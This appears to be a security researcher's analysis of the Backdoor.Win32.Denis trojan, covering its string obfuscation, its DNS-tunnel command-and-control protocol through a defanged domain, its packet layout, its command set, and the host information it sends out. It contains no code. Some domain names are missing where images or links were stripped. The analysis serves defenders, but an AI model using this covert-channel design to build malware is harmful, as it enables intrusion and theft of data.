Just like lots of other Trojans before it, Backdoor.Win32.Denis extracts the addresses of the functions it needs to operate from loaded DLLs. However, instead of calculating the checksums of the names in the export table (which is what normally happens), this Trojan simply compares the names of the API calls against a list. The list of API names is encrypted by subtracting 128 from each symbol of the function name.

It should be noted that the bot uses two versions of encryption: for API call names and the strings required for it to operate, it does the subtraction from every byte; for DLLs, it subtracts from every other byte. To load DLLs using their names, LoadLibraryW is used, meaning wide strings are required.

‘Decrypting’ strings in the Trojan

Names of API functions and libraries in encrypted format

It should also be noted that only some of the functions are decrypted like this. In the body of the Trojan, references to extracted functions alternate with references to functions received from the loader.

C&C Communication

The principle behind a DNS tunnel’s operation can be summed up as: “If you don’t know, ask somebody else”. When a DNS server receives a DNS request with an address to be resolved, the server starts looking for it in its database. If the record isn’t found, the server sends a request to the domain stated in the database.

Let’s see how this works when a request arrives with the URL to be resolved. The DNS server receives this request and first attempts to find the domain extension ‘.com’, then ‘’, but then it fails to find ‘’ in its database. It then forwards the request to and asks it if such a name is known to it. In response, is expected to return the appropriate IP; however, it can return an arbitrary string, including C&C instructions.

Dump of Backdoor.Win32.Denis traffic

This is what Backdoor.Win32.Denis does. The DNS request is sent first to, then forwarded to z.teriava[.]com. Everything that comes before this address is the text of the request sent to the C&C.

Here is the response:

DNS packet received in response to the first request

Obviously, the request sent to the C&C is encrypted with Base64. The original request is a sequence of zeros and the result of GetTickCount at the end. The bot subsequently receives its unique ID and uses it for identification at the start of the packet.

The instruction number is sent in the fifth DWORD, if we count from the start of the section highlighted green in the diagram above. Next comes the size of the data received from C&C. The data, packed using zlib, begins immediately after that.

The unpacked C&C response

The first four bytes are the data size. All that comes next is the data, which may vary depending on the type of instruction. In this case, it’s the unique ID of the bot, as mentioned earlier. We should point out that the data in the packet is in big-endian format.

The bot ID (highlighted) is stated at the beginning of each request sent to the C&C

C&C Instructions

Altogether, there are 16 instructions the Trojan can handle, although the number of the last instruction is 20. Most of the instructions concern interaction with the file system of the attacked computer. Also, there are capabilities to gain info about open windows, call an arbitrary API or obtain brief info about the system. Let us look into the last of these in more detail, as this instruction is executed first.

Complete list of C&C instructions

Information about the infected computer, sent to the C&C

As can be seen in the screenshot above, the bot sends the computer name and the user name to the C&C, as well as the info stored in the registry branch Software\INSUFFICIENT\INSUFFICIENT.INI:

  • Time when that specific instruction was last executed. (If executed for the first time, ‘GetSystemTimeAsFileTime’ is returned, and the variable BounceTime is set, in which the result is written);
  • UsageCount from the same registry branch.

Information about the operating system and the environment is also sent. This info is obtained with the help of NetWkstaGetInfo.

The data is packed using zlib.

The DNS response prior to Base64 encryption

The fields in the response are as follows (only the section highlighted in red with data and size varies depending on the instruction):

  • Bot ID;
  • Size of the previous C&C response;
  • The third DWORD in the C&C response;
  • Always equals 1 for a response;
  • GetTickCount();
  • Size of data after the specified field;
  • Size of response;
  • Actual response.

After the registration stage is complete, the Trojan begins to query the C&C in an infinite loop. When no instructions are sent, the communication looks like a series of empty queries and responses.

Sequence of empty queries sent to the C&C


The use of a DNS tunneling for communication, as used by Backdoor.Win32.Denis, is a very rare occurrence, albeit not unique. A similar technique was previously used in some POS Trojans and in some APTs (e.g. Backdoor.Win32.Gulpix in the PlugX family). However, this use of the DNS protocol is new on PCs. We presume this method is likely to become increasingly popular with malware writers. We’ll keep an eye on how this method is implemented in malicious programs in future.